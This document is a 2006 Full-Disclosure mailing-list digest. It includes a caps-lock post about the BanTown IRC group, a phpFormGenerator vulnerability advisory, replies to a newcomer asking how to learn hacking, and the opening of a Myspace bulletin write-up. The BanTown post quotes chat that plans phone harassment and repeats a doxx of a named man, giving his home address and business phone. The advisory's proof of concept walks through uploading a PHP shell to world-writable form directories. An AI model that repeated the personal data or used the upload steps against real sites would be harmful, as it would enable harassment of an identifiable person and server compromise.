weev i need you to find some mexican woman in houston
weev and just relentlessly troll her
weev call her up at all hours of the night
weev screaming ROB LEVIN, ROB LEVIN
weev and then we're going to say she's the nanny for his kids

WEEVE ALSO ENCOURAGE INGOC TO HACKING ACTIVITIES, PROBABLY FOR HIS
OWN USAGE LATER ON. I EXCERPT:

weev incog: can you get flickr?
incog ill try
cstone oh god flickr would be hilarious
incog flickr uses yahoo id's
weev not necessarily
weev there are internal flickr ids too
weev and it doesnt use the yahoo cookie
weev basically you auth with your yahoo id
weev and then it gives you a flickr cookie
weev and from there its all flickr

LIKE SAID, WEEV KNOW A LOT AND PROBABLY RINGLEADER, OR AS THEY SAID
IN AMERICA, MASTER OF PUPPETS. AND I DO THINK MANY PEOPLE ON THE
CHANNEL PUPPETS. SOME VERY SCRIPT-KIDDIE LIKE. WELL, IT OBVIOUS ALL
ARE SCRIPT KIDDIE, BUT SOME ARE VERY. VERY. MOST ALSO IRC KIDDIE. I
EXCERPT:

tem they unbelievers must be purged
tem they unbelievers must be purged
tem they unbelievers must be purged
tem they unbelievers must be purged
tem they unbelievers must be purged
tem they unbelievers must be purged
bizzy WHY IS SALAD SO GOOD?!!?!
bizzy WHY IS SALAD SO GOOD?!!?!
bizzy WHY IS SALAD SO GOOD?!!?!

AS YOU CAN SEE, SOME VERY DUMB AND NOT UNDERSTAND IRC CLIENT PROPERLY.
THERE MANY MORE EXAMPLE OF ABOVE EXCERPT, BUT I LIMIT TO THAT CAUSE IS
ANNOYING. BUT WORSE IS YET TO COME, B/C WEEAVE POST PERSONAL
INFOMATION OF ROBERT LIVIN, OTHERWISE KNOWN AS LELO ON FREENODE
NETWORK, THE TRUCK DRIVER, FOR PLANE VIEW OF ALL TO ABUSE. BANTOWN
ALSO RESPONSIBLE FOR POST OF INFORMATION TO CRAIGLIST AND OTHER
PLACES. I EXCERPT BUT MUST CENSOR SO THIS INFO IS NOT USED FOR CRIME:

weev philsanchez: lilo's federal employer identification number is xx-xxx
weev his federal identification number is xx-xxx
weev the address officially listed for pdpc is 10100 main street #31
houson tx 77025
weev phone number for pdpc officially listed is 713-589-5863
weev his ssn is xxx xx 
weev his dob is xx-xx-1955
weev 11-digit texas state taxpayer number xxx
weev ROBERT LEVIN
weev 9212 BURDINE ST. #1005
weev HOUSTON, TX 77096
weev the last address is his apartment
weev no, he doesnt live in a trailer

MANY ON #BANTOON SPEAK HIGHLY OF RUIN, WHICH IS SKRIPT-KIDDIE FOR
CAUSE HAVOK ON IRC OR NETWORK OR SOME MAIL PROGRAMS. SOME ALSO EAT
SALAD OR DISPLAY ANNOYING QUIRK WHERE THEY NOT MAKE SENSE FOR EXTENDED
PERIOD OF TIME AND ACT LIKE 

RE: [Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread php0t


  Thanks for the 0day advisory! It helped out a lot.

(ps: 10yrs English course, 10yrs security would have been a better
choice for you if you ask me)

 HELLO, MY NAME AMIT. I SECURITY RESEARCH FROM ALL OVER WORLD AND
CURRENTLY THIS MY FIRST 
 ADVISORY TO ANYONE RESARCHING. I POST TO MAILING LIST IN INTEREST OF
EXPULSION OF KNOWLEDGE.

 THIS IRC CHANNEL IS FULL OF THE BADDEST SCRIPT KIDDIE I HAVE SEEN IN A
LONG WHILE, AND I WORK ON 
 SECURITY FOR OVER 20 YEAR, EVEN BEFORE MODERN PC ARE COMMONPLACE AS
USER. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Browser bugs hit IE, Firefox today (SANS)

2006-06-30 Thread Schmehl, Paul L
 -Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Juha-Matti
Laurio
Sent: Thursday, June 29, 2006 8:08 PM
To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Browser bugs hit IE, Firefox today (SANS)

The related SANS Internet Storm Center Diary entry is the following:
http://isc.sans.org/diary.php?storyid=1448

This story was updated later on Wednesday to include detailed test results.
The Secunia test link included in the SA20825 advisory was used.

I have not reproduced it with Firefox 1.5.0.4 in Win XP SP2 and W2K SP4 SF,
for some reason.
The Firefox version is localized in my test environment as well.

Tested on:
Firefox 1.5.0.4 on Mac OS 10.4 - not vulnerable
Firefox 1.5.0.4 on FreeBSD 6.0 (x86)  - not vulnerable
Firefox 1.5.0.4 on Windows XP Professional SP2 - not vulnerable
Internet Explorer 6.0.2900.2180.xpsp.050622-1524 on Windows XP Professional
SP2 - vulnerable

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
http://www.utdallas.edu/ir/security/



RE: [Full-disclosure] New member asking question...

2006-06-30 Thread Reynolds, Joseph R

Question for everyone on the board?

I have been reading the posts over the past few weeks, and am wondering
how the heck you guys discover these vulnerabilities.  Granted, I am
still very new to the IS world, but I cannot begin to understand how you
discover weaknesses.  After reading these posts, the explanation always
makes sense, but are you guys actively seeking weaknesses, or just
happen to come across them?

Also, are there any good hacking books that I could read?  I have had
a Hackers Tools and Techniques class at school, but all of the programs
are very outdated, like l0phtcrack, JTR, ethereal or wireshark, and
such.  I am looking to actually enter systems or find ways to enter
systems and understand the weakness that allows it so I can avoid it
later.

Thanks everyone.


Joseph K. Reynolds
Systems Support Analyst - Intermediate
Enterprise Rent-A-Car
Email JR Reynolds
314-512-2370




[Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread AMIT SECURITY

 Thanks for the 0day advisory! It helped out a lot.


YOU ARE VERY WELCOME SIR.


(ps: 10yrs English course, 10yrs security would have been a better
choice for you if you ask me)


PLEASE DO NOT ATTACK MY ENGLISH. I HAVE TAKED 12 YEARS
OF ENGLISH CLASSES, AND AS I CLEAR STATE IN MY ADVISORY,
MY PROFESSIONAL EXPERIENCE IN SECURITY FIELD EXTENSIVE
OF 20 YEARS. MAYBE YOU WOULD HAVE BETTER CHOICE
WITH YEARS OF LEARNING TO READ. THANKS YOU.

AMIT



Re: [Full-disclosure] Corporate Virus Threats

2006-06-30 Thread n3td3v

On 6/30/06, Antczak, Ed [EMAIL PROTECTED] wrote:


I second the motion.
An opportunity to focus and filter the broad spectrum of security issues
is welcome if possible.

Edwin Antczak
Windows Engineer


I see a major loophole here, as we don't know how much traffic on the
dedicated SecurityFocus lists is being moderated, and the potentially
useful information being turned away.

Sure, script kid flames may be anti-social, but even they are useful
to a certain audience (government, law enforcement).

I see a big black spot right now, where high-profile moderation of
serious security topics is being moderated into the SecurityFocus
profit-margin model rather than protecting the needs of consumer and
corporate interests.

It's time for an open source full disclosure alternative to the
SecurityFocus list-set, in order to really know what's going on,
because you can bet even the stuff the SecurityFocus moderators get to
see is passed on to Symantec's intelligence engine, even if the
moderator doesn't let the thread go live on the SecurityFocus lists.

I.e. Symantec are getting so much more information than the average
joe, via the intelligence posted to moderators, than the public gets to
see, and that frustrates me.

Symantec have a huge intelligence facility in England; it's an old
nuclear bunker with huge steel doors, where they compile intelligence
data sent to the list moderators, and only a small percentage of that
goes live to the public.

We need more lists, so people can cross-post and see what's really
getting sent to SecurityFocus moderators and rejected in all security
specialized subjects, not just new bug disclosure.



Re: [Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread n3td3v

On 6/30/06, AMIT SECURITY [EMAIL PROTECTED] wrote:

HELLO, MY NAME AMIT. I SECURITY RESEARCH FROM ALL OVER WORLD AND
CURRENTLY THIS MY FIRST ADVISORY TO ANYONE RESARCHING. I POST TO
MAILING LIST IN INTEREST OF EXPULSION OF KNOWLEDGE.

RECENTLY I HEAR OF FREENODE ATTACK AND SOME OPERATORS OWNED FROM
SNIFFING OR SOMETHING LIKE THAT. THIS VERY BAD BUT IT HAPPEN IN MY
COUNTRY ALL TIME. I SAY TO MYSELF, AMIT, YOU MUST HELP CATCH CRIMINAL
WHO DO THIS TO NON-PROFIT ORGANISATION SO I SET OUT TO LEARN ALL THAT
I CAN ABOUT THAT CRIMINAL. I FIND OUT TWO GROUP ARE MAY BE TO BLAME,
GNNA AND BANTOWNE.  GNNA STAND FOR GAY NATIONAL NARCOTICS ALLEGIANCE
MY FRIEND FROM WORK SAY, BUT HE NOT KNOW WHAT BANTOWNE STAND FOR. I
FIND NO INFO ON GAY NATIONAL NARCOTICS ALLIANCE, AND MY INTUITION
TELL ME BANTOWNE TO BLAME.  SO THROUGH DEVIOUS MEANS I INFILTRATE
BANTOWNE IRC CHANNEL WITH IS LOCATED AT IRC.BANTOWN.ORG (NOTE: IT
MINUS THE E) AND THE CHANNEL IS HIDDEN BUT STILL I FIND IT. IT
CALLED #BANTOWN (MINUS THE E TOO).

THIS IRC CHANNEL IS FULL OF THE BADDEST SCRIPT KIDDIE I HAVE SEEN IN A
LONG WHILE, AND I WORK ON SECURITY FOR OVER 20 YEAR, EVEN BEFORE
MODERN PC ARE COMMONPLACE AS USER. EVEN SOME PEOPLE IN CHANNEL KNOW
PERL OR OTHER USEFUL LANGUAGE. I VERY IMPRESSED. SOME FRIENDLY PEOPLE
IN CHANNEL, LOT OF THEM SAY LOL MOST TIME THEY SPEAK. SOME NOT SO
FRIENDLY, SAY BAD WORD BUT THAT OK, THEY CRIMINAL SO WHO CARE. I
PRESENT FRIENDLY APPEARANCE, THEY TALK FRIENDLY TO ME. THIS NIGHT OF
FREENODE HACK NEWS AND THEY PISSED OFF AT LILO, WHO SEEM TO BE SEMI
TRUCK DRIVER AND LIVE IN BACK OF TRUCK IN TRUCK TRAILER, CAUSE THEY
SAY HE LOTS OF BAD THINGS. SOME OF THEM BE VERY SKILLED PROFESSIONAL
AT HACK. ONE GO BY INCOG AND HE MASTER OF CROSSED-SITE-SCRIPTING
VULNERABILITY. HE SURF SITES LOOKING FOR VULNERABILITY ALL DAY LONG. I
EXCERPT FROM CHANNEL:

incog that reminds me... ill go find xss in fark.com

Re: [Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread Cardoso
Some free advice:

Use your capslock key.

You do not want to be seen as a newbie or script kid using 1337 speak.

Real people over 12 with IQs over 45 don't write in 1337 speak OR use
all caps.

One of the first hints to detect a phishing mail/website is bad grammar
and lack of respect for writing rules, like using, like or like, StRanGe
CaPiTaLiZatIONS and other newbie behaviours.




On Fri, 30 Jun 2006 12:14:59 -0500
AMIT SECURITY [EMAIL PROTECTED] wrote:

AS   Thanks for the 0day advisory! It helped out a lot.
AS 
AS YOU ARE VERY WELCOME SIR.
AS 
AS  (ps: 10yrs English course, 10yrs security would have been a better
AS  choice for you if you ask me)
AS 
AS PLEASE DO NOT ATTACK MY ENGLISH. I HAVE TAKED 12 YEARS
AS OF ENGLISH CLASSES, AND AS I CLEAR STATE IN MY ADVISORY,
AS MY PROFESSIONAL EXPERIENCE IN SECURITY FIELD EXTENSIVE
AS OF 20 YEARS. MAYBE YOU WOULD HAVE BETTER CHOICE
AS WITH YEARS OF LEARNING TO READ. THANKS YOU.
AS 
AS AMIT
AS 
AS 

year(now) + 1 will be the year of Linux!
Cardoso [EMAIL PROTECTED] - SkypeIn: (11) 3711-2466 / (41) 3941-5299
digital life: http://www.contraditorium.com personal site and blog:
http://www.carloscardoso.com



RE: [Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread Debasis Mohanty
IS YOUR *caps lock* DAMAGED BEYOND REPAIR?? 

-d

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of AMIT
SECURITY
Sent: Friday, June 30, 2006 10:45 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Advisory from AMIT concern BANTOWNE

  Thanks for the 0day advisory! It helped out a lot.

YOU ARE VERY WELCOME SIR.

 (ps: 10yrs English course, 10yrs security would have been a better 
 choice for you if you ask me)

PLEASE DO NOT ATTACK MY ENGLISH. I HAVE TAKED 12 YEARS OF ENGLISH CLASSES,
AND AS I CLEAR STATE IN MY ADVISORY, MY PROFESSIONAL EXPERIENCE IN SECURITY
FIELD EXTENSIVE OF 20 YEARS. MAYBE YOU WOULD HAVE BETTER CHOICE WITH YEARS
OF LEARNING TO READ. THANKS YOU.

AMIT



Re: [Full-disclosure] New member asking question...

2006-06-30 Thread n3td3v

On 6/30/06, Reynolds, Joseph R [EMAIL PROTECTED] wrote:


Question for everyone on the board?

I have been reading the posts over the past few weeks, and am wondering
how the heck you guys discover these vulnerabilities.  Granted, I am
still very new to the IS world, but I cannot begin to understand how you
discover weaknesses.  After reading these posts, the explanation always
makes sense, but are you guys actively seeking weaknesses, or just
happen to come across them?

Also, are there any good hacking books that I could read?  I have had
a Hackers Tools and Techniques class at school, but all of the programs
are very outdated, like l0phtcrack, JTR, ethereal or wireshark, and
such.  I am looking to actually enter systems or find ways to enter
systems and understand the weakness that allows it so I can avoid it
later.

Thanks everyone.


Joseph K. Reynolds
Systems Support Analyst - Intermediate
Enterprise Rent-A-Car
Email JR Reynolds
314-512-2370





Two kinds of hackers:

1. Homemade hackers, typically loners with social problems who spend
their time in front of computers to feed their social stimulation via
the international wide area network. They have so much free time that
they've learned how to hack on their own steam. Because of the lack of
social background, advanced users in this group have the time to
discover and research ground-breaking security and penetration
techniques of major vendors, with a real threat to the single mom and
retired couple community, as well as a threat to corporate and
government interests.

2. The guy who went to high school, passed grades, has friends, social
circles, goes out and lives a great life.

They all of a sudden decide they want to go to university; they go to a
computer science course dedicated to ethical hacking, where they learn
the ins and outs of hacking corporate infrastructure. They often
post to the internet on college computers, showing off skills they've
just recently learnt from the lecturer (Matthew Murphy, *cough*) and
get full media coverage by all the major security outlets (*cough*
Robert Lemos). This is of course a great injustice to the real
people who dedicate their entire social and educational life to the
subject as noted in example 1.

Additionally - There's always going to be a balance between homemade
hackers (example 1) and manufactured hackers (example 2).

Finally - The very fact you've asked the question you've stated leads
me to believe you fall into example 2, as someone who falls into
example 2 would never post this kind of message to the international
WAN security community, respectively.



Re: [Full-disclosure] New member asking question...

2006-06-30 Thread Valdis . Kletnieks
On Fri, 30 Jun 2006 11:47:37 CDT, Reynolds, Joseph R said:

 Also, are there any good Hacking books that I could read?  I have had
 a Hackers Tool and Techniques class at school, but all of the programs
 are very outdated, like l0phtcrack, JTR, ethereal or wireshark, and

I wouldn't call any of these outdated - they're still some of the best
tools in their categories.

 such.  I am looking to actually enter systems or find ways to enter
 systems and understand the weakness that allows it so I can avoid it
 later. 

It turns out that you don't actually need to be very good at *finding*
weaknesses in order to secure against them.  All you need is a good grasp
of what general classes of vulnerabilities there are, and what they can gain
an attacker.  If you need to look at actual code, I'd suggest getting a
copy of Metasploit, and just *looking* at it.  Look at the payloads section,
as that will give you a good idea of the sorts of payloads you might get
hit with.  Then just assume that the Bad Guy has an exploit for any given
outward-facing code and resource on your system...

If you want to be scared about how many exploits are already out there,
look at Nessus or the Packetstormsecurity archives. ;)

In order to secure against this, the proper method is:

0) Simply applying all the current patches for your system, and properly
configuring it, will go a *long* way.  Two good resources:

Center for Internet Security (http://www.cisecurity.org)
the NSA security guides 
(http://www.nsa.gov/snac/downloads_os.cfm?MenuID=scg10.3.1.1)

(Basically, these go through all the high-risk issues discussed in 1-4 below,
and give you an easy cookbook so you don't have to re-do the research.
Disclaimer: I'm one of the perpetrators of the various CIS Unix/Linux guides,
so I'm a bit biased.)

The two biggest areas those guides don't address in depth are social engineering
and abuse of inter-machine trust relationships (if you manage to find a
weak password on one box, and then get into a second because there's a
file share or SSH key or similar...)

1) Pick a piece of code or resource that an attacker could potentially attack
(for instance, your Apache server, or a Windows file share).

2) *ASSUME* that the attacker has a Magic Bullet that can exploit it.  You
don't need to *find* one, just proceed as if the bad guy did all the hard work
and found it.

3) Start looking at ways to mitigate and control the damage.  For instance,
many buffer overflow Magic Bullets can be stopped with "run Apache with a
non-exec stack".  Many "own the file share" Bullets can be stopped with either
"don't export the share to the world" or "firewall the Windows file-share
ports". And so on.

4) Lather, rinse, repeat for all the attacks you can think of.



Re: [Full-disclosure] New member asking question...

2006-06-30 Thread n3td3v

Valdis falls into example 2 of my discussion:

2. The guy who went to high school, passed grades, has friends, social
circles, goes out and lives a great life.


They all of a sudden decide they want to go to university; they go to a
computer science course dedicated to ethical hacking, where they learn
the ins and outs of hacking corporate infrastructure. They often
post to the internet on college computers, showing off skills they've
just recently learnt from the lecturer (Matthew Murphy, *cough*) and
get full media coverage by all the major security outlets (*cough*
Robert Lemos). This is of course a great injustice to the real
people who dedicate their entire social and educational life to the
subject as noted in example 1.


Additionally - There's always going to be a balance between homemade
hackers (example 1) and manufactured hackers (example 2).


Finally - The very fact you've asked the question you've stated leads
me to believe you fall into example 2, as someone who falls into
example 1 would never post this kind of message to the international
WAN security community, respectively.



Re: [Full-disclosure] New member asking question...

2006-06-30 Thread Michael Holstein

I have been reading the posts over the past few weeks, and am wondering
how the heck you guys discover these vulnerabilities.  Granted, I am
still very new to the IS world, but I cannot begin to understand how you
discover weaknesses.  After reading these posts, the explanation always
makes sense, but are you guys actively seeking weaknesses, or just
happen to come across them?


Learn how things are *supposed* to work (for example, write your own
webserver in C), then intentionally throw broken requests at it.
Eventually you'll find a result you *didn't* expect, and that's what you
should investigate. Knowing *what* is broken is never as important as *why*.


As mentioned by another, learning to dream in C and understanding asm
go a *long* way.


Oh .. and one more note .. practice on your own stuff. It's easy to get
arrested in the process of learning if you're not careful. When you get
good at it, play nice and adhere to the rules of responsible
disclosure (search the archives for lengthy threads on this separate issue).


/mike.



Re: [Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread AMIT SECURITY

i am sorry, did not realize cap key is turned on. will type off now. thanks
you to n3td3v for farther information of bantowne.

amit

On 6/30/06, Debasis Mohanty [EMAIL PROTECTED] wrote:

IS YOUR *caps lock* DAMAGED BEYOND REPAIR??

-d

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of AMIT
SECURITY
Sent: Friday, June 30, 2006 10:45 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Advisory from AMIT concern BANTOWNE

  Thanks for the 0day advisory! It helped out a lot.

YOU ARE VERY WELCOME SIR.

 (ps: 10yrs English course, 10yrs security would have been a better
 choice for you if you ask me)

PLEASE DO NOT ATTACK MY ENGLISH. I HAVE TAKED 12 YEARS OF ENGLISH CLASSES,
AND AS I CLEAR STATE IN MY ADVISORY, MY PROFESSIONAL EXPERIENCE IN SECURITY
FIELD EXTENSIVE OF 20 YEARS. MAYBE YOU WOULD HAVE BETTER CHOICE WITH YEARS
OF LEARNING TO READ. THANKS YOU.

AMIT







[Full-disclosure] Weird... www.eon8.com

2006-06-30 Thread Jay Buhrt
Does anyone know about this site, or the projects related to it? 
www.eon8.com ?


--
Jay Buhrt
Achievement Focused Technology, Inc.
[EMAIL PROTECTED]
574-538-8944



[Full-disclosure] phpFormGenerator

2006-06-30 Thread Morning Wood

- EXPL-A-2006-004 exploitlabs.com Advisory 049 -
              - phpFormGenerator -




AFFECTED PRODUCTS
=================
phpFormGenerator  v2.09
http://phpformgen.sourceforge.net/


OVERVIEW
========
phpFormGenerator is an easy-to-use tool to create reliable 
and efficient web forms in a snap. No programming of any 
sort is required. Just follow along the phpFormGenerator 
wizard and at the end, you will have a fully functional web 
form!


note:
as stated by the vendor this script is widely used with cPanel
and other hosting provider solutions.



DETAILS
===
phpFormGenerator by default installs all directories
as chmod 777 and will not function if they are not set as such.

in the readme:
3. Set read+write+execute file permissions on the 'forms'
directory and *everything* inside it 
(including all subdirectories and files)


UNIX:
chmod -R 777 forms

in process2.php:
please make sure that the forms directory (and everything in it)
has read+write access. you can achieve this by issuing the following
command on linux/unix:
chmod -R 777 forms


researcher note:
when the application's directories are not set 777 the app errors with:


File and Directory permissions 
The forms directory is not writeable.

The forms/admin directory is not writeable.
The use directory is not writeable.
Please give read+write permissions to all the files
and directories mentioned above. Refresh this page
after you have done so.


SOLUTION
========
vendor contact:
Musawir Ali [EMAIL PROTECTED] June 30, 2006

patch: none ( see vendor response )


VENDOR RESPONSE
===
there are no security flaws ... if you had taken a moment to think,
you would realize that a major software company such as cPanel would
not be shipping phpFormGenerator with their scripts if it had flaws.
In any case, the program has been thoroughly tested by myself and
other security experts and is not known to have any issues.

777 is never forced, the suggested method is to give write permissions
to the group the process belongs to.
"upload function is insecure. arbitrary php functions are insecure..."
could you be any more vague? You seem to be one of those ignorant
nuts who shout slogans like "windows sucks", "linux owns", "your server
is insecure" without realizing the garbage spooling out of your mouth.

you're wasting my time.
btw.. just so that you know, i have been on openbsd's development
team, written the opengl kit for the openbeos OS project (now Haiku),
and am an official GNU maintainer:
http://www.gnu.org/people/people.html (search for my name) ... what
you should be doing is thinking about how to contribute to the
opensource community and not being a bitch.



PROOF OF CONCEPT
================
1.browse to the default install directory

2.create new form with the file upload function

3.complete the form using "Insert data to MySQL database table?" = no

4.as directed browse to http://[host]/[appdir]/[newform_name]/form1.html

5.upload a phpshell-type script

6.if you supplied an email address, the link will be sent to you
  http://[host]/[appdir]/[newform_name]/files/thescript_name_generated.php


CREDITS
===
This vulnerability was discovered and researched by 
Donnie Werner of exploitlabs


Donnie Werner
Information Security Specialist
[EMAIL PROTECTED]
[EMAIL PROTECTED]

--
web: http://exploitlabs.com

http://exploitlabs.com/files/advisories/EXPL-A-2006-004-phpformgen.txt

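The proof of concept above works because two conditions coincide in a default phpFormGenerator install: the README's `chmod -R 777 forms` makes the form directories writable by every local user and by the web server, and the server also executes scripts from those same directories, so an uploaded `.php` file can be requested and run. The script below is an added example, not part of the exploitlabs advisory or of phpFormGenerator. It audits a web root for that combination (world-writable directories and server-side scripts sitting in them) and emits an Apache 2.4 `.htaccess` body that turns script execution off in an upload directory. The directory layout in `demo` and the file names in it are constructed for illustration; the `.htaccess` assumes mod_php and an `AllowOverride` that permits these directives.

```shell
#!/bin/sh
# Added example for the phpFormGenerator advisory. Not part of the advisory
# or of phpFormGenerator. Finds the precondition its proof of concept needs:
# a directory the web server can write to AND serve scripts from.

# audit_writable_webroot ROOT
# Prints one line per world-writable directory under ROOT and one line per
# PHP-style script found directly inside such a directory.
audit_writable_webroot() {
    root=$1
    find "$root" -type d -perm -0002 2>/dev/null | sort | while IFS= read -r dir; do
        printf 'WORLD-WRITABLE %s\n' "$dir"
        find "$dir" -maxdepth 1 -type f \
            \( -name '*.php' -o -name '*.phtml' -o -name '*.php[345]' \) 2>/dev/null |
        sort | while IFS= read -r f; do
            printf 'SCRIPT-IN-WRITABLE-DIR %s\n' "$f"
        done
    done
}

# count_world_writable_dirs ROOT
# Number of world-writable directories under ROOT (0 is the desired state).
count_world_writable_dirs() {
    find "$1" -type d -perm -0002 2>/dev/null | wc -l | tr -d ' '
}

# no_exec_htaccess
# Apache 2.4 .htaccess body that stops PHP execution in an upload directory:
# mod_php's engine switch plus a request-time deny for the usual PHP
# extensions. Printed to stdout so it can be reviewed, then installed with
#   no_exec_htaccess > forms/<form>/files/.htaccess
# Assumes mod_php and AllowOverride permitting Options/AuthConfig.
no_exec_htaccess() {
    cat <<'EOF'
# Uploaded files are data, never code.
php_flag engine off
<FilesMatch "\.(php|phtml|php[345])$">
    Require all denied
</FilesMatch>
EOF
}

# demo
# Builds a constructed tree mirroring the advisory's layout (forms/<form>/files
# made 777 as the README instructs) and audits it. The .php file stands in
# for a script dropped through the form's upload field; it is constructed here.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/forms/contact/files" "$tmp/forms/admin" "$tmp/lib"
    chmod -R 777 "$tmp/forms"        # the README's instruction
    chmod 755 "$tmp/lib"
    : > "$tmp/forms/contact/files/c99_8f3a.php"   # constructed stand-in for an upload
    : > "$tmp/forms/contact/files/resume.pdf"
    audit_writable_webroot "$tmp"
    printf 'world-writable dirs: %s\n' "$(count_world_writable_dirs "$tmp")"
    rm -rf "$tmp"
}
```

Run it as `. ./audit.sh && audit_writable_webroot /var/www/html` (or `demo` for the constructed tree). The audit reports permission bits, not what the server will actually execute, so a clean run is necessary but not sufficient; the vendor's own suggestion of group-writable rather than world-writable directories still leaves the "server writes here and executes from here" problem, which is what the `.htaccess` addresses.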


Re: [Full-disclosure] Advisory from AMIT concern BANTOWNE

2006-06-30 Thread Vidar Løkken

On Fri, 30 Jun 2006, AMIT SECURITY wrote:


i am sorry, did not realize cap key is turned on. will type off now. thanks
you to n3td3v for farther information of bantowne.


We did not mean that you can not use your shift key for normal 
capitalization...

--
MVH,
Vidar
God doesn't play dice.
-- Albert Einstein

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] phpFormGenerator

2006-06-30 Thread pingywon

btw.. just so that you know, i have been on openbsd's development

team, written the opengl kit for the openbeos OS project (now Haiku),
and am an official GNU maintainer:
http://www.gnu.org/people/people.html (search for my name) ... what
you should be doing is thinking about how to contribute to the
open-source community and not being a bitch.



...just so you KNOW

see how popular he is... there can't be any flaws in his software. He's 
popular.


~pingywon MCSE
www.pingywon.com
www.illmob.org
www.freeillwill.com




- Original Message - 
From: Morning Wood [EMAIL PROTECTED]

To: full-disclosure@lists.grok.org.uk
Sent: Friday, June 30, 2006 5:11 PM
Subject: [Full-disclosure] phpFormGenerator



 - EXPL-A-2006-004 exploitlabs.com Advisory 049 -
   - phpFormGenerator -




AFFECTED PRODUCTS
=
phpFormGenerator  v2.09
http://phpformgen.sourceforge.net/


OVERVIEW

phpFormGenerator is an easy-to-use tool to create reliable and efficient 
web forms in a snap. No programming of any sort is required. Just follow 
along the phpFormGenerator wizard and at the end, you will have a fully 
functional web form!


note:
as stated by the vendor this script is widely used with cPanel
and other hosting provider solutions.



DETAILS
===
phpFormGenerator by default installs all directories
as chmod 777 and will not function if they are not set as such.

in the readme:
3. Set read+write+execute file permissions on the 'forms'
directory and *everything* inside it (including all subdirectories and 
files)


UNIX:
chmod -R 777 forms

in process2.php:
please make sure that the forms directory (and everything in it)
has read+write access. you can achieve this by issuing the following
command on linux/unix:
chmod -R 777 forms


researcher note:
when the application's directories are not set 777, the app errors with:


File and Directory permissions The forms directory is not writeable.
The forms/admin directory is not writeable.
The use directory is not writeable.
Please give read+write permissions to all the files
and directories mentioned above. Refresh this page
after you have done so.


SOLUTION

vendor contact:
Musawir Ali [EMAIL PROTECTED] June 30, 2006

patch: none ( see vendor response )


VENDOR RESPONSE
===
there are no security flaws ... if you had taken a moment to think,
you would realize that a major software company such as cPanel would
not be shipping phpFormGenerator with their scripts if it had flaws.
In any case, the program has been thoroughly tested by myself and
other security experts and is not known to have any issues.

777 is never forced, the suggested method is to give write permissions
to the group the process belongs to.
upload function is insecure. arbitrary php functions are insecure...
could you be any more vague? You seem to be one of those ignorant
nuts who shout slogans like windows sucks linux owns your server
is insecure without realizing the garbage spooling out of your mouth.

you're wasting my time.
btw.. just so that you know, i have been on openbsd's development
team, written the opengl kit for the openbeos OS project (now Haiku),
and am an official GNU maintainer:
http://www.gnu.org/people/people.html (search for my name) ... what
you should be doing is thinking about how to contribute to the
open-source community and not being a bitch.



PROOF OF CONCEPT

1.browse to the default install directory

2.create new form with the file upload function

3.complete the form using Insert data to MySQL database table? = no

4.as directed browse to http://[host]/[appdir]/[newform_name]/form1.html;

5.upload phpshell type of script

6.if you supplied an email address, the link will be sent to you
  http://[host]/[appdir]/[newform_name]/files/thescript_name_generated.php


CREDITS
===
This vulnerability was discovered and researched by Donnie Werner of 
exploitlabs


Donnie Werner
Information Security Specialist
[EMAIL PROTECTED]
[EMAIL PROTECTED]

--
web: http://exploitlabs.com

http://exploitlabs.com/files/advisories/EXPL-A-2006-004-phpformgen.txt

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] New member asking question...

2006-06-30 Thread Valdis . Kletnieks
On Fri, 30 Jun 2006 20:20:26 BST, n3td3v said:

 Valdis falls into example 2 of my discussion:
 
 2. The guy who went to high school, passed grades, has friends, social
 circles, goes out and lives a great life.

Don't presume to be sure over which example I'm more like.  Also, you
seem to be convinced that there's a binary distinction, and that nobody
can be a member of both groups at once.

Also, note the context of the original question:

  systems and understand the weakness that allows it so I can avoid it
  later.

The skillset of a good defender (who is trying to avoid it later) is quite
different from the skillset of a good attacker.  Now, if he had been asking
how to be a good attacker, he'd have gotten a different list of suggestions...



pgpGaUCKHabvd.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Data Mining Myspace Bulletins

2006-06-30 Thread John Hackenger

Myspace Bulletins: The good, the bad, and the ugly

Data Mining Myspace, a case study

Author: stderr ([EMAIL PROTECTED])
http://stderr.linuxinit.net

Original release:
http://www.pandora-security.com

--

1. Abstract

We all know about myspace.com, and I'll go ahead and admit
that I actually have an account to keep up with friends.
Myspace is full of a bunch of idiots, but it can be a great
tool for keeping up with people... when used properly.

Myspace has long been a hacker playground, you may remember
the infamous "Samy is my hero" worm. The worm took advantage
of several poor input validation techniques which were being
employed. Each person that went to a page with his script in it,
automatically sent him a friend request. After this alarming
stunt, Myspace fixed a lot of the injection vulnerabilities.

--

2. Introduction to Bulletins

On Myspace, you can send bulletins which are sent to all
of the friends on your list. That way if you're going on
vacation or something, you can let ALL of your friends know
what's happening by sending only one message. Most people
assume that only their friends can read the bulletins they
post... they are sadly mistaken.

When you open up a bulletin, you go to a url like the following.

http://bulletin.myspace.com/index.cfm?fuseaction=bulletin.read&messageID=1

